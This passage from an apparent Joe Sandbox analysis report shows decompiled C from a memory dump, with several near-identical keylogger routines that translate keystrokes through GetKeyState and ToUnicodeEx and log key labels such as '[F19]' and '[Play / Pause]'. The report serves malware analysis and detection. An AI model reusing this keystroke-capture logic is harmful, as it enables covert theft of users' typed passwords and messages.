							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85d13
0x00c85d1a
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Page Down], xrefs: 00C85D15
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85B48, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B48(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F19]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85b48
0x00c85b4f
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[F19], xrefs: 00C85B4A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85CCF, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85CCF(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Play / Pause]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85ccf
0x00c85cd6
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Play / Pause], xrefs: 00C85CD1
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C8588F, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C8588F(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[Execute]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c8588f
0x00c85896
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[Execute], xrefs: 00C85891
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85B7B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B7B(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F21]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85b7b
0x00c85b82
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
[F21], xrefs: 00C85B7D
KeyDelBackspace, xrefs: 00C85E2A

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85B26, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85B26(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F17]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85b26
0x00c85b2d
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
